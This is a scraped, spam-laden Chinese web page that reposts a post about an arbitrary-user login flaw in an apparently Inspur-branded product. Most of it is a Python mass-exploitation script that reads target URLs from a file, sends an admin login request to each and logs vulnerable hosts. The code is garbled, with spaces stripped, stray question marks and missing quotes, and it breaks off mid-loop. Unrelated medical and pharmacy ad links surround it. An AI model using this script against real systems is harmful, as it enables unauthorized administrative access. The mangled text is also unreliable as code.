网上药店
您现在的位置: 翻译官 >> 翻译官素质 >> 正文 >> 正文

某潮任意用户登录漏洞

来源:翻译官 时间:2021/5/29
有关白癜风 http://m.39.net/pf/a_4350935.html

importsys,requests,urllib3,threadingurllib3.disable_warnings()

lock=threading.Lock()

defexp(url):??

exp_url=url+/login??

headers={"User-Agent":"Mozilla/5.0(Linux;Android6.0;Nexus5Build/MRA58N)AppleWebKit/.36(KHTML,likeGecko)Chrome/88.0..MobileSafari/.36"}??

poc=

{op:login,????username:admin,????password:"pwd"}???

try:

ret=requests.post(exp_url,headers=headers,data=poc,timeout=10,verify=False)????

ifunexpectedEOFinret.text:??????lock.acquire()??????

try:???????

withopen(success.txt,a)asf:???f.write(exp_url+\n)??????????print(url)????????

lock.release()??????

except:????????

lock.release()??

exceptExceptionase:????print(e)????

passdefprintf():??

print(use:python3x潮v4.0.pyurl.txt)if__name__=="__main__":?thread=[]??

iflen(sys.argv)!=2:????

printf()????

exit(0)??

withopen(sys.argv[1])asf:????

forurlinf:??????

url=url.replace(\n,)??????

ifurl.find(

转载请注明:http://www.chongqinghg.com/fygsz/8684.html